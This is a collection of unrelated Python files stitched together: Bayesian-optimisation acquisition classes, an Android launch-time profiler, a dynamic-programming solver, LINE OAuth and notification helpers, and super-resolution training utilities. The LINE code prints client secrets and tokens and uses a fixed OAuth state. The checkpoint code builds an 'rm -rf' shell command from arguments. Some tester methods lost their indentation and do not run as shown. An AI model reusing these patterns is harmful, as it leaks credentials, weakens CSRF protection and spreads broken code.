    def __init__(self, model, space, optimizer=None, cost_withGradients=None, exploration_weight=2):
        self.optimizer = optimizer
        super(GPyOptQuadratureAcquisition, self).__init__(model, space, optimizer)
        if cost_withGradients is not None:
            print('The set cost function is ignored! LCB acquisition does not make sense with cost.')

    def _compute_acq(self, x):
        """
        Acquisition value: the predictive standard deviation at x.
        """
        m, s = self.model.predict(x)
        f_acqu = s
        return f_acqu

    def _compute_acq_withGradients(self, x):
        """
        Acquisition value and its gradient: std deviation and d(std)/dx.
        """
        m, s, dmdx, dsdx = self.model.predict_withGradients(x)
        f_acqu = s
        df_acqu = dsdx
        return f_acqu, df_acqu
class GPyOptAcquisitionModelMismatch(GPyOptAcquisitionBase):
    """
    Model-mismatch acquisition: |m1(x) - m2(x)| plus an exploration bonus of
    exploration_weight times the first model's standard deviation.
    :param model: GPyOpt class of model
    :param model2: second GPyOpt model to compare against
    :param space: GPyOpt class of domain
    :param optimizer: optimizer of the acquisition. Should be a GPyOpt optimizer
    :param cost_withGradients: function
    :param exploration_weight: scales the std-deviation exploration term
    .. Note:: does not allow to be used with cost
    """
    analytical_gradient_prediction = False

    def __init__(self, model, model2, space, optimizer=None, cost_withGradients=None, exploration_weight=2):
        self.optimizer = optimizer
        super(GPyOptAcquisitionModelMismatch, self).__init__(model, space, optimizer)
        if cost_withGradients is not None:
            print('The set cost function is ignored! LCB acquisition does not make sense with cost.')
        self.model2 = model2
        self.exploration_weight = exploration_weight

    def _compute_acq(self, x):
        """
        Acquisition value: |m - m2| + exploration_weight * sqrt(s).
        """
        m, s = self.model.predict(x)
        m2, s2 = self.model2.predict(x)
        f_acqu = np.abs(m - m2) + self.exploration_weight * np.sqrt(s)
        return f_acqu
# def _compute_acq_withGradients(self, x):
# """
# Computes the GP-Lower Confidence Bound and its derivative
# """
# m, s, dmdx, dsdx = self.model.predict_withGradients(x)
# m2, s2, dmdx2, dsdx2 = self.model2.predict_withGradients(x)
#
# f_acqu = s
# df_acqu = dsdx
# return f_acqu, df_acqu
|
# -*- coding: utf-8 -*-
import os
import threading
import time
import datetime
import json
import shutil
import queue
from queue import Queue
from multiprocessing import Process
from subprocess import PIPE
from app import Android
from app_config.config import ZHIHU_PACKAGE_NAME
from app_config.config import ZHIHU_ACTIVITY_PATH
from app_config.config import TMP_IMG_ZHIHU_DIR
from app_config.config import WEIBO_PACKAGE_NAME
from app_config.config import WEIBO_ACTIVITY_PATH
from app_config.config import TMP_IMG_WEIBO_DIR
from app_config.config import TOP_TODAY_PACKAGE_NAME
from app_config.config import TOP_TODAY_ACTIVITY_PATH
from app_config.config import TMP_IMG_TOP_TODAY_DIR
from app_config.config import BAIDU_PACKAGE_NAME
from app_config.config import BAIDU_ACTIVITY_PATH
from app_config.config import TMP_IMG_BAIDU_DIR
from app_config.config import ZHIHU_SORTED_STAGE
from app_config.config import EXCLUDED_LIST
from app_config.config import ZHIHU_PERCENT
from app_config.config import BAIDU_PERCENT
from app_config.config import TOP_TODAY_PERCENT
from app_config.config import WEIBO_PERCENT
from msg_queue.queue_manager import QueueManager
from minicap.minicap import MinicapStream
from cal_time import CalTime
from record import Record
class AndroidTester(object):
    def __init__(self, test_count, platform, device_id, package_name, activity_name, app_name, test_mode):
        """Set up per-app test state and start the shared queue manager.

        test_mode: 1 = screenshot + test, 2 = screenshot only,
        3 = test only.
        """
        self.test_count = test_count
        self.total_time = {}  # storage shape: total_time = {totaltime: tasks_times}
        self.total_time_lock = threading.Lock()
        self.platform = platform
        self.device_id = device_id
        self.android = Android(device_id)
        self.apk_info = {}
        self.result = []
        self.package_name = package_name
        self.activity_name = activity_name
        self.app_name = app_name
        self.model_code = 1
        self.answer_queue = Queue()
        self.msg_queue = Queue()
        self.need_screenshot = 1
        self.need_test = 1
        self.task_pid_status = {}
        self.start_dt = {}
        # Decode test_mode into the two feature flags.
        if test_mode == 1:
            self.need_screenshot = 1
            self.need_test = 1
        elif test_mode == 2:
            self.need_screenshot = 1
            self.need_test = 0
        elif test_mode == 3:
            self.need_screenshot = 0
            self.need_test = 1
        # Select the per-app configuration (stage percents, start-time json
        # file, model code, temp screenshot directory) for the package
        # under test.
        if self.package_name == ZHIHU_PACKAGE_NAME:
            self.STAGE_PERCENT = ZHIHU_PERCENT
            self.json_file_name = "start_time_zhihu.json"
            self.model_code = 1
            self.tmp_pic_dir = TMP_IMG_ZHIHU_DIR
        elif self.package_name == WEIBO_PACKAGE_NAME:
            self.STAGE_PERCENT = WEIBO_PERCENT
            self.json_file_name = "start_time_weibo.json"
            self.model_code = 2
            self.tmp_pic_dir = TMP_IMG_WEIBO_DIR
        elif self.package_name == TOP_TODAY_PACKAGE_NAME:
            self.STAGE_PERCENT = TOP_TODAY_PERCENT
            self.json_file_name = "start_time_top_today.json"
            self.model_code = 3
            self.tmp_pic_dir = TMP_IMG_TOP_TODAY_DIR
        elif self.package_name == BAIDU_PACKAGE_NAME:
            self.STAGE_PERCENT = BAIDU_PERCENT
            self.json_file_name = "start_time_baidu.json"
            self.model_code = 4
            self.tmp_pic_dir = TMP_IMG_BAIDU_DIR
        # if os.path.exists(self.tmp_pic_dir):
        #     shutil.rmtree(self.tmp_pic_dir)
        # Expose the task-status dict and the two queues over a local
        # multiprocessing manager so worker processes can reach them.
        QueueManager.register('get_task_status', callable=lambda : self.task_pid_status)
        QueueManager.register('get_answer_queue', callable=lambda: self.answer_queue)
        QueueManager.register('get_msg_queue', callable=lambda : self.msg_queue)
        self.manager = QueueManager(address=('localhost', QueueManager.SHARED_PORT), authkey=b'1234')
        self.manager.start()
        self.shared_task_status_dt = self.manager.get_task_status()
        self.shared_answer_queue = self.manager.get_answer_queue()
        self.shared_msg_queue = self.manager.get_msg_queue()
def _get_apk_info(self):
data = self.android.get_aapt_data()
print('data : ' + data)
for line in data.split("\n"):
if line.startswith("package:"):
for word in line.split(" "):
if "=" in word:
word = word.replace("'", "")
self.apk_info[word.split("=")[0]] = word.split("=")[1]
def _get_time_stamp(self, filename):
fn, ext = os.path.splitext(filename)
d = datetime.datetime.strptime(fn, "%Y-%m-%d_%H-%M-%S-%f")
ts = datetime.datetime.timestamp(d)
return ts
def _dispatch_cal_task(self):
    """Run the frame-time calculation over every screenshot directory,
    two worker processes at a time, then aggregate and print averages.

    Reads the per-run start timestamps written by capture_pic() from the
    JSON file, spawns `_cal_time` workers, waits for all of them via the
    shared status dict, then drains the shared answer queue and prints a
    trimmed-mean launch time.
    """
    capture_path = os.path.abspath(os.path.join(self.tmp_pic_dir, os.pardir))
    # NOTE(review): this file handle is never closed; consider `with open(...)`.
    fp = open(os.path.join(capture_path, self.json_file_name))
    self.start_dt = json.load(fp)
    screenshots_dir = os.path.join(self.tmp_pic_dir, self.platform)
    ls = os.listdir(screenshots_dir)
    # Directory names are the 1-based run counters written by capture_pic().
    times_list = [int(name) for name in ls if not name.startswith(".")]
    times_list.sort()
    i = 0
    flag_1 = False  # True while worker slot 1 is busy
    flag_2 = False  # True while worker slot 2 is busy
    # length = len(times_list)
    length = self.test_count
    finished_list = []
    # Keep at most two calculation processes alive at any moment.
    while i < length:
        if not flag_1:
            str_time_list_i = str(times_list[i])
            pictures_dir_1 = os.path.join(screenshots_dir, str_time_list_i)
            task_process_1 = Process(target=self._cal_time, args=(pictures_dir_1, str_time_list_i, self.start_dt[str_time_list_i], self.model_code))
            task_process_1.start()
            self.shared_task_status_dt.setdefault(task_process_1.pid, False)
            flag_1 = True
            i += 1
        if not flag_2 and i < length:
            str_time_list_i = str(times_list[i])
            pictures_dir_2 = os.path.join(screenshots_dir, str_time_list_i)
            task_process_2 = Process(target=self._cal_time, args=(pictures_dir_2, str_time_list_i, self.start_dt[str_time_list_i], self.model_code))
            task_process_2.start()
            self.shared_task_status_dt.setdefault(task_process_2.pid, False)
            flag_2 = True
            i += 1
        # Workers flip their pid's entry to True in the shared dict when done.
        status1 = self.shared_task_status_dt.get(task_process_1.pid)
        if status1 and task_process_1.pid not in finished_list:
            finished_list.append(task_process_1.pid)
            flag_1 = False
        # NOTE(review): when length == 1, task_process_2 is never bound and the
        # next line raises NameError — confirm test_count is always >= 2.
        status2 = self.shared_task_status_dt.get(task_process_2.pid)
        if status2 and task_process_2.pid not in finished_list:
            finished_list.append(task_process_2.pid)
            flag_2 = False
    # Busy-wait until every spawned worker has reported completion.
    while True:
        is_all_finished = True
        for status in self.shared_task_status_dt.values():
            is_all_finished = is_all_finished and status
        if is_all_finished:
            break
    print()
    print('#######################')
    print()
    # Collect the samples; drop one min and one max, then average the rest.
    launch_time_ls = []
    loading_time_ls = []
    while True:
        try:
            data = self.shared_answer_queue.get_nowait()
            msg = json.loads(data)
            dirname = msg['dirname']
            summary = msg['summary']
            info = msg['info']
            total_time = msg['total_time']
            launch_time = msg['result']['launch_time']
            loading_time = msg['result']['home_page_loading_time']
            print("文件夹:%s" % dirname)
            print("\t%s" % summary)
            print("\t%s" % info)
            print("\t%s" % (total_time))
            print("\tApp 启动时长:%.3fs" % (launch_time))
            # print("\tApp 启动时长:%.3fs App 首页加载时长:%.3fs" % (launch_time, loading_time))
            print('#######################')
            print()
            if launch_time > 0:
                launch_time_ls.append(int(launch_time * 1000))
            if loading_time > 0:
                loading_time_ls.append(int(loading_time * 1000))
        except queue.Empty:
            break
    launch_time_ls.sort()
    loading_time_ls.sort()
    len1 = len(launch_time_ls)
    len2 = len(loading_time_ls)
    # Trimmed mean in integer milliseconds; needs more than two samples.
    if len1 > 2:
        aver_launch_time = 1.0 * sum(launch_time_ls[1:-1]) / (len1 - 2)
    else:
        aver_launch_time = 0
    if len2 > 2:
        aver_home_page_loading_time = 1.0 * sum(loading_time_ls[1:-1]) / (len2 - 2)
    else:
        aver_home_page_loading_time = 0
    aver_launch_time /= 1000
    aver_home_page_loading_time /= 1000
    str_aver = "%s App 的平均启动时长:%.3fs" % (self.app_name, aver_launch_time)
    # str_aver = "平均启动时长:%.3fs 平均加载时长: %.3fs" % (aver_launch_time, aver_home_page_loading_time)
    print(str_aver)
def parse_data(self, msg_data):
    """Deserialize a JSON message string and return the parsed object.

    Bug fix: the original parsed the message into a local and silently
    discarded it; returning the parsed object makes the method usable while
    staying backward compatible (previous callers ignored the implicit None).
    """
    return json.loads(msg_data)
def _cal_time(self, pic_dir, times_counter, start_time, model_code):
    # Worker entry point executed inside a child Process: run the frame-time
    # calculation over one screenshot directory.
    # CalTime and EXCLUDED_LIST are defined elsewhere in this module.
    ct = CalTime(times_counter, model_code)
    ct.cal_time(pic_dir, EXCLUDED_LIST, start_time)
def capture_pic(self):
    """Drive self.test_count measured app launches and record screenshots.

    Performs warm-up launches first, then for each measured run announces
    the run number to the screenshot worker through the shared message
    queue, launches the activity with `am start -W`, and records the wall
    clock start time. Finally writes all start times to a JSON file.
    """
    # The first 4 launches are warm-ups and not measured: ads are more
    # likely to appear on early launches.
    for times in range(4):
        self.android.start_app(self.package_name, self.activity_name)
        time.sleep(12)
        self.android.kill_app(self.package_name)
        time.sleep(5)
    self.minicap = MinicapStream(port=QueueManager.MINICAP_PORT, model_code=self.model_code)
    self.minicap.run()
    for times in range(self.test_count):
        self.shared_msg_queue.put(times + 1)
        # Launch the LauncherActivity.
        print('正在启动 MainActivity 进行测试...')
        p_am = self.android.adb([
            'shell', 'am', 'start', '-W', '-n', '%s/%s' % (self.package_name, self.activity_name)
        ], stdout=PIPE)
        self.start_time = time.time()
        self.start_dt[times + 1] = self.start_time
        # Wait for `am start -W` to return, i.e. MainActivity finished starting.
        while p_am.poll() is None:
            time.sleep(0.1)
        time.sleep(15)
        self.android.kill_app(self.package_name)
        time.sleep(5)
        # Ready to start the next capture round.
        self.shared_msg_queue.put(-1)
    # Tell the worker to close the socket connected to minicap.
    self.shared_msg_queue.put(-2)
    # Persist each run's start time for later analysis.
    fp = os.path.join(os.path.join(self.tmp_pic_dir, os.pardir), self.json_file_name)
    with open(fp, "w") as fobj:
        json.dump(self.start_dt, fobj)
def test(self):
# 先捕获图片
if self.need_screenshot == 1:
self.capture_pic()
# 不管有几个文件夹,每次都只跑两个进程
if self.need_test == 1:
self._dispatch_cal_task()
def query_service(port):
    """Ask `lsof` who owns the given TCP port.

    Returns (is_listening, pid_string); (False, -1) when no process owns it.
    """
    output = os.popen("lsof -i tcp:%d" % port).read().strip()
    if not output:
        return False, -1
    last_fields = output.split("\n")[-1].split()
    pid = last_fields[1]
    return last_fields[-1] == "(LISTEN)", pid
def close_shared_server():
    # Kill whatever process (if any) is bound to the shared QueueManager port.
    # NOTE(review): query_service returns pid as a string when found and the
    # int -1 otherwise, so the `!= -1` test only filters the not-found case.
    state, pid = query_service(QueueManager.SHARED_PORT)
    if pid != -1:
        os.system("kill %s" % pid)
if __name__ == '__main__':
    # Script entry point: profile Zhihu's launch time on the attached device,
    # always tearing down the shared QueueManager server afterwards.
    try:
        test_counter = 10  # NOTE(review): unused; the literal 10 is passed below
        device_id = os.popen("adb shell getprop ro.serialno").read().strip()
        package_name = "com.zhihu.android"
        activity_name = ".app.ui.activity.LauncherActivity"
        # print(device_id)
        at = AndroidTester(10, "Android", device_id, package_name, activity_name, cal_mode="2")
        # at.capture_pic()
        at._dispatch_cal_task()
    finally:
        close_shared_server()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# ----------------------------------
# @Date : 2020/4/6
# @Author : Zhicheng Qian
# @Version : 1.0
# @Brief :
# @Description :
# @Reference :
# ----------------------------------
class T:
    """Minimum-total-cost path across the columns of a value grid.

    Starting in any row of column 0, one step moves to any row of the next
    column at cost abs(next_value - current_value); `test` returns the
    cheapest total cost of reaching the last column.
    """

    def __init__(self, LL):
        # dp[i][j] caches the minimal cost from cell (i, j) to the last
        # column; -1 marks "not computed" (real costs are always >= 0).
        self.dp = [[-1] * len(row) for row in LL]

    def recur(self, LL, i, j, n):
        """Return the minimal cost from cell (i, j) to column n (memoized)."""
        if j == n:
            self.dp[i][j] = 0
            return 0
        candidates = []
        # Bug fix: the cache test was `> 0`, which never reused a cached 0
        # and caused redundant recursion near the last column; compare
        # against the -1 sentinel instead.
        # Generalized: iterate all rows instead of hard-coding rows 0..2.
        for k in range(len(LL)):
            sub = self.dp[k][j + 1]
            if sub == -1:
                sub = self.recur(LL, k, j + 1, n)
            candidates.append(sub + abs(LL[k][j + 1] - LL[i][j]))
        self.dp[i][j] = min(candidates)
        return self.dp[i][j]

    def test(self, LL):
        """Return the minimal cost starting from any row of column 0."""
        n = len(LL[0]) - 1
        return min(self.recur(LL, k, 0, n) for k in range(len(LL)))
if __name__ == '__main__':
    # Demo run: prints the minimal path cost for the sample grid (9 here).
    # LL = [[1, 3, 6], [2, 4, 7], [3, 5, 10]]
    LL = [[1, 6, 12], [2, 8, 20], [3, 9, 30]]
    tt = T(LL)
    ret = tt.test(LL)
    print(ret)
|
class AuthToken:
    """Round-robin supplier of 'Bearer ...' authorization header values."""

    tokens: list          # pre-formatted 'Bearer <token>' strings
    current_token: int = 0  # index of the token currently in use

    def __init__(self, tokens: list) -> None:
        # Pre-format once so get_token() only indexes.
        self.tokens = ['Bearer {}'.format(token) for token in tokens]
        # Idiom fix: make the cursor a per-instance attribute instead of
        # relying on a mutable class attribute shared across instances.
        self.current_token = 0

    def next_token(self) -> None:
        """Advance the cursor, wrapping around at the end of the list."""
        self.current_token = (self.current_token + 1) % len(self.tokens)

    def get_token(self) -> str:
        """Return the currently selected 'Bearer ...' value."""
        return self.tokens[self.current_token]
|
# -*- coding: utf8 -*-
import requests
from models import oper_para
from django.contrib.auth.models import User
from models import LineUserInfo
def GetToken(code):
    """Exchange a LINE Notify OAuth2 authorization code for an access token.

    Reads client_id / client_secret / redirect_uri from the oper_para table
    and POSTs to the LINE Notify token endpoint; returns the raw JSON
    response body as text.
    """
    import json
    client_id = oper_para.objects.get(name='client_id')
    client_secret = oper_para.objects.get(name = 'client_secret')
    redirect_uri = oper_para.objects.get(name = 'redirect_uri')
    # NOTE(review): printing the client secret leaks credentials into logs.
    print "code:" + code
    print "client_id:" + client_id.content
    print "client_secret:" + client_secret.content
    r = requests.post("https://notify-bot.line.me/oauth/token",
        data={
            "grant_type":"authorization_code",
            "code":code,
            "redirect_uri":redirect_uri.content,
            "client_id":client_id.content,
            "client_secret":client_secret.content
        },
        headers={
            "Content-Type":"application/x-www-form-urlencoded"
        }
    )
    print r.text.encode('utf-8')
    return r.text
def GetLoginToken(code):
    """Exchange a LINE Login authorization code for an access token, fetch
    the owner's profile, and return (userId, displayName, pictureUrl)."""
    def GetLineProfile(token):
        # Fetch the LINE profile belonging to `token`; returns the raw body.
        r = requests.post("https://api.line.me/v2/profile",
            headers=
            {
                "Authorization":"Bearer " + token,
                "Content-Type":"application/x-www-form-urlencoded"
            }
        )
        print r.text.encode('utf-8')
        return r.text
    import json
    channel_id = oper_para.objects.get(name = 'login_client_id')
    client_secret = oper_para.objects.get(name = 'login_client_secret')
    redirect_uri = oper_para.objects.get(name = 'login_redirect_uri')
    #https://api.line.me/v2/oauth/accesstoken
    r = requests.post("https://api.line.me/v2/oauth/accessToken",
        data={
            "grant_type":"authorization_code",
            "client_id":channel_id.content,
            "client_secret":client_secret.content,
            "code":code,
            "redirect_uri":redirect_uri.content
        },
        headers={
            "Content-Type":"application/x-www-form-urlencoded"
        }
    )
    print r.text.encode('utf-8')
    jsont = json.loads(r.text)
    r=GetLineProfile(jsont['access_token'])
    jsonr = json.loads(r)
    mid = jsonr['userId']
    mName = jsonr['displayName']
    mpictureUrl = jsonr['pictureUrl']
    print 'mid:' + mid
    print 'displayName:' + mName.encode('utf-8')
    print 'pictureUrl:' + mpictureUrl
    return mid, mName, mpictureUrl
def GetLineNotifyUrl(vemail):
    """Build and return the LINE Notify OAuth authorization URL.

    NOTE(review): `vemail` is unused, and `state` is the hard-coded constant
    'abcde', which defeats the CSRF protection the state parameter exists
    for — consider a per-session random value.
    """
    client_id = oper_para.objects.get(name='client_id')
    redirect_uri = oper_para.objects.get(name = 'redirect_uri')
    URL = 'https://notify-bot.line.me/oauth/authorize?'
    URL += 'response_type=code'
    URL += '&client_id=' + client_id.content
    URL += '&redirect_uri=' + redirect_uri.content
    URL += '&scope=notify'
    URL += '&state=abcde'
    print URL
    return URL
def sendmsg(vuser= User,msg = ''):
    """Send `msg` through LINE Notify on behalf of `vuser` and increment the
    user's stored message counter.

    NOTE(review): the default `vuser=User` binds the Django User *class* as
    the default value, which cannot have a `lineuserinfo` — callers must
    always pass a real user instance.
    """
    print "token:" + vuser.lineuserinfo.token
    r = requests.post("https://notify-api.line.me/api/notify",
        data={
            "message":msg
        },
        headers=
        {
            "Authorization":"Bearer " + vuser.lineuserinfo.token,
            "Content-Type":"application/x-www-form-urlencoded"
        }
    )
    # Bump the per-user message counter and refresh the stored token.
    LU = LineUserInfo.objects.get(user = vuser)
    cnt = LU.msgcnt
    cnt = cnt + 1
    LU.msgcnt = cnt
    LU.token = vuser.lineuserinfo.token
    LU.save()
    print r.text.encode('utf-8')
    return r.text
def sendgmail():
    """Send a fixed HTML email through Gmail SMTP using credentials stored
    in the oper_para table.

    NOTE(review): SUBJECT/TEXT/FROM/TO are defined but the raw HTML is sent
    with no MIME headers, so no subject appears; and because the except
    clause re-raises immediately, the error print/return below it are
    unreachable.
    """
    import smtplib
    gu = oper_para.objects.get(name='gu')
    gp = oper_para.objects.get(name='gp')
    gmail_user = gu.content
    gmail_pwd = gp.content
    FROM = 'tiomor4n@gmail.com'
    TO = 'tiomor4n@gmail.com'
    SUBJECT = 'this is subject'
    TEXT = 'text'
    message = """
    <!DOCTYPE html>
    <html>
    <head>
    </head>
    <body>
    <table style='width:60%;margin-left:auto;margin-right:auto;'>
    <tr>
    <td style='background-color:green;color:#fff;padding-top:50px;padding-bottom:50px;text-align:center;'>
    <p style='font-size:30px;'>This is sample html email</p>
    <a href='http://www.techipapa.blogspot.com/' style='color:#fff;text-decoration:none;font-size:35px;'>Click here</a>
    </td>
    </tr>
    </table>
    </body>
    </html>
    """
    try:
        server = smtplib.SMTP("smtp.gmail.com", 587)
        server.ehlo()
        server.starttls()
        server.login(gmail_user, gmail_pwd)
        server.sendmail(FROM, TO, message)
        print "Successfully sent email"
        return 'mail send'
    except:
        raise
        print "Error: unable to send email"
        return 'mail not send'
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import cv2
from sklearn.metrics import auc
import math
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import init
from data import common
from skimage.measure import compare_psnr, compare_ssim
class timer():
    """Stopwatch that can accumulate elapsed time across intervals."""

    def __init__(self):
        self.acc = 0
        self.tic()

    def tic(self):
        """Start (or restart) timing from now."""
        self.t0 = time.time()

    def toc(self, restart=False):
        """Return seconds elapsed since the last tic(); optionally restart."""
        elapsed = time.time() - self.t0
        if restart:
            self.t0 = time.time()
        return elapsed

    def hold(self):
        """Fold the current interval into the accumulator."""
        self.acc += self.toc()

    def release(self):
        """Return the accumulated time and clear the accumulator."""
        total, self.acc = self.acc, 0
        return total

    def reset(self):
        """Clear the accumulator."""
        self.acc = 0
class checkpoint():
    """Experiment bookkeeping helper.

    Manages the experiment directory ('../experiment/<name>'), the textual
    log file, the per-epoch metric history tensor, PSNR/NME plots, and a
    pool of background processes that write result images to disk.
    """
    def __init__(self, args):
        # `args` is the parsed CLI namespace; args.save / args.load select
        # the experiment directory, args.reset wipes it first.
        self.args = args
        self.ok = True
        self.log = torch.Tensor()  # metric history; grows via add_log()
        now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
        if not args.load:
            if not args.save:
                args.save = now  # default experiment name: timestamp
            self.dir = os.path.join('..', 'experiment', args.save)
        else:
            self.dir = os.path.join('..', 'experiment', args.load)
            if os.path.exists(self.dir):
                # Resume: restore the metric history written by save().
                self.log = torch.load(self.get_path('psnr_log.pt'))
                print('Continue from epoch {}...'.format(len(self.log)))
            else:
                args.load = ''
        if args.reset:
            os.system('rm -rf ' + self.dir)
            args.load = ''
        os.makedirs(self.dir, exist_ok=True)
        os.makedirs(self.get_path('model'), exist_ok=True)
        for d in args.data_test:
            os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
        # Append to existing logs when resuming, otherwise start fresh.
        open_type = 'a' if os.path.exists(self.get_path('log.txt'))else 'w'
        self.log_file = open(self.get_path('log.txt'), open_type)
        with open(self.get_path('config.txt'), open_type) as f:
            f.write(now + '\n\n')
            for arg in vars(args):
                f.write('{}: {}\n'.format(arg, getattr(args, arg)))
            f.write('\n')
        self.n_processes = 8  # background image-writer processes
    def get_path(self, *subdir):
        """Join path components under the experiment directory."""
        return os.path.join(self.dir, *subdir)
    def save(self, trainer, epoch, is_best=False):
        """Persist model, loss, optimizer state and the metric plot for `epoch`."""
        trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
        trainer.loss.save(self.dir)
        trainer.loss.plot_loss(self.dir, epoch)
        self.plot_psnr(epoch)
        trainer.optimizer.save(self.dir)
        torch.save(self.log, self.get_path('psnr_log.pt'))
    def add_log(self, log):
        """Append one epoch's metrics to the history tensor."""
        self.log = torch.cat([self.log, log])
    def write_log(self, log, refresh=False):
        """Print `log` and append it to log.txt; reopen the file if `refresh`."""
        print(log)
        self.log_file.write(log + '\n')
        if refresh:
            self.log_file.close()
            self.log_file = open(self.get_path('log.txt'), 'a')
    def done(self):
        """Close the log file at the end of the experiment."""
        self.log_file.close()
    def plot_psnr(self, epoch):
        """Plot the PSNR history per test set and scale to a PDF."""
        axis = np.linspace(1, epoch, epoch)
        for idx_data, d in enumerate(self.args.data_test):
            label = 'SR on {}'.format(d)
            fig = plt.figure()
            plt.title(label)
            for idx_scale, scale in enumerate(self.args.scale):
                plt.plot(
                    axis,
                    self.log[:, idx_data, idx_scale].numpy(),
                    label='Scale {}'.format(scale)
                )
            plt.legend()
            plt.xlabel('Epochs')
            plt.ylabel('PSNR')
            plt.grid(True)
            plt.savefig(self.get_path('test_psnr_{}.pdf'.format(d)))
            plt.close(fig)
    def plot_nme(self, epoch):
        """Plot the face-alignment NME history per test set and scale to a PDF."""
        axis = np.linspace(1, epoch, epoch)
        for idx_data, d in enumerate(self.args.data_test):
            label = 'Face Alignment on {}'.format(d)
            fig = plt.figure()
            plt.title(label)
            for idx_scale, scale in enumerate(self.args.scale):
                plt.plot(
                    axis,
                    self.log[:, idx_data, idx_scale].numpy(),
                    label='Scale {}'.format(scale)
                )
            plt.legend()
            plt.xlabel('Epochs')
            plt.ylabel('NME')
            plt.grid(True)
            plt.savefig(self.get_path('test_nme_{}.pdf'.format(d)))
            plt.close(fig)
    def begin_background(self):
        """Start n_processes workers that save queued (filename, tensor) pairs."""
        self.queue = Queue()
        def bg_target(queue):
            # Worker loop: a (None, None) item is the shutdown sentinel.
            while True:
                if not queue.empty():
                    filename, tensor = queue.get()
                    if filename is None: break
                    imageio.imwrite(filename, tensor.numpy())
        self.process = [
            Process(target=bg_target, args=(self.queue,)) \
            for _ in range(self.n_processes)
        ]
        for p in self.process: p.start()
    def end_background(self):
        """Send one sentinel per worker, drain the queue, and join the workers."""
        for _ in range(self.n_processes): self.queue.put((None, None))
        while not self.queue.empty(): time.sleep(1)
        for p in self.process: p.join()
    def save_results(self, dataset, filename, save_list, scale):
        """Queue SR/LR/HR result tensors for asynchronous PNG writing."""
        if self.args.save_results:
            # for v in save_list:
            #     normalized = v[0].mul(255 / self.args.rgb_range)
            #     tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
            #     self.queue.put((filename, tensor_cpu))
            filename = self.get_path(
                'results-{}'.format(dataset.dataset.name),
                '{}_x{}_'.format(filename, scale)
            )
            postfix = ('SR', 'LR', 'HR')
            for v, p in zip(save_list, postfix):
                normalized = v[0].mul(255 / self.args.rgb_range)
                tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
                self.queue.put(('{}{}.png'.format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
    """Snap `img` to the 255-level integer grid while keeping its rgb_range
    scale: scale up, clamp to [0, 255], round, scale back down."""
    scale = 255 / rgb_range
    return img.mul(scale).clamp(0, 255).round().div(scale)
def convert_rgb_to_y(tensor):
    """Convert the first image of an (N, C, H, W) tensor to the Y (luma)
    channel as an (H, W, 1) ndarray; grayscale inputs pass through."""
    image = tensor[0].cpu().numpy().transpose(1, 2, 0)
    is_single_channel = image.ndim <= 2 or image.shape[2] == 1
    if is_single_channel:
        return image
    #xform = np.array([[65.481, 128.553, 24.966]])
    #y_image = image.dot(xform.T) + 16.0
    weights = np.array([[65.738 / 256.0, 129.057 / 256.0, 25.064 / 256.0]])
    return image.dot(weights.T) + 16.0
def calc_psnr(sr, hr, scale, rgb_range, dataset=None, facebb=[]):
    """Compute (PSNR, SSIM) on the Y channel inside the face bounding box.

    NOTE(review): `facebb=[]` is a mutable default and the function indexes
    facebb[0] unconditionally, so callers must always pass the bounding box.
    `dataset` and the grayscale `diff` computed below are unused in the
    final metric, which is recomputed from convert_rgb_to_y outputs.
    """
    # Y channel
    if hr.nelement() == 1: return 0
    diff = (sr - hr) / rgb_range
    shave = scale  # border width excluded from the crop
    facebb = facebb[0].numpy()
    if diff.size(1) > 1:
        gray_coeffs = [65.738, 129.057, 25.064]
        convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
        diff = diff.mul(convert).sum(dim=1)
    # NOTE(review): for NCHW tensors size() yields (N, C, H, W), so `w` here
    # is actually the height and `h` the width — confirm inputs are square
    # or that this asymmetry is intended.
    _, _, w, h = hr.size()
    # Clip the face box to the shaved image interior.
    x1 = max(int(facebb[0]), shave)
    x2 = min(int(facebb[2]), w-shave)
    y1 = max(int(facebb[1]), shave)
    y2 = min(int(facebb[3]), h-shave)
    image1 = convert_rgb_to_y(sr)
    image2 = convert_rgb_to_y(hr)
    image1 = image1[y1:y2, x1:x2, :]
    image2 = image2[y1:y2, x1:x2, :]
    psnr = compare_psnr(image1, image2, data_range=rgb_range)
    ssim = compare_ssim(image1, image2, win_size=11, gaussian_weights=True, multichannel=True, K1=0.01, K2=0.03,
                        sigma=1.5, data_range=rgb_range)
    return psnr, ssim
def make_optimizer(args, target):
    '''
    make optimizer and scheduler together

    Builds the optimizer selected by args.optimizer (SGD / ADAM / RMSprop)
    over the trainable parameters of `target`, wraps it in a subclass that
    also owns a MultiStepLR scheduler (milestones parsed from args.decay,
    e.g. "200-400-600"), and adds save/load/schedule helpers.
    '''
    # optimizer
    # trainable = target.model.specify_parameter(args.lr, args.weight_decay)
    trainable = filter(lambda x: x.requires_grad, target.parameters())
    kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
    if args.optimizer == 'SGD':
        optimizer_class = optim.SGD
        kwargs_optimizer['momentum'] = args.momentum
        kwargs_optimizer['nesterov'] = True
    elif args.optimizer == 'ADAM':
        optimizer_class = optim.Adam
        kwargs_optimizer['betas'] = args.betas
        kwargs_optimizer['eps'] = args.epsilon
    elif args.optimizer == 'RMSprop':
        optimizer_class = optim.RMSprop
        kwargs_optimizer['eps'] = args.epsilon
    # scheduler
    milestones = list(map(lambda x: int(x), args.decay.split('-')))
    kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
    scheduler_class = lrs.MultiStepLR
    class CustomOptimizer(optimizer_class):
        # The chosen optimizer plus an attached LR scheduler and
        # checkpointing helpers.
        def __init__(self, *args, **kwargs):
            super(CustomOptimizer, self).__init__(*args, **kwargs)
        def _register_scheduler(self, scheduler_class, **kwargs):
            self.scheduler = scheduler_class(self, **kwargs)
        def save(self, save_dir):
            # Persist optimizer state (momentum buffers etc.) to optimizer.pt.
            torch.save(self.state_dict(), self.get_dir(save_dir))
